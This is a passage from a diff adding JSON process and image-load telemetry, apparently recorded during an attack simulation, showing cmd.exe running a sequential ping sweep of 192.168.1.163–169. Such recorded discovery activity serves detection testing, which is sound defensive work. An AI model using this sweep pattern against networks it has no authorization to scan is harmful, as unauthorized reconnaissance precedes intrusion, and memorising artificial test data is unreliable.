"{42FC7E13-CB9D-5C05-0000-00104B205301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572777140000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "event_type": "process", + "pid": 5596, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572781830000, + "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.163", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6036, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572781980000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572781990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "event_type": "process", + "pid": 6036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572786840000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.164", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4724, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4724, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572786990000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "event_type": "process", + "pid": 4724, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572791840000, + "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.165", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4816, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572791980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "event_type": "process", + "pid": 4816, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.166", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1284, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572797029984, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572796980000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "event_type": "process", + 
"pid": 1284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572801990000, + "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.167", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4664, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + 
"unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572802140000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "event_type": "process", + "pid": 4664, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572806840000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.168", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7448, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": 
"{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "process", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572811990000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.169", + "event_type": "process", + "logon_id": 217055, + 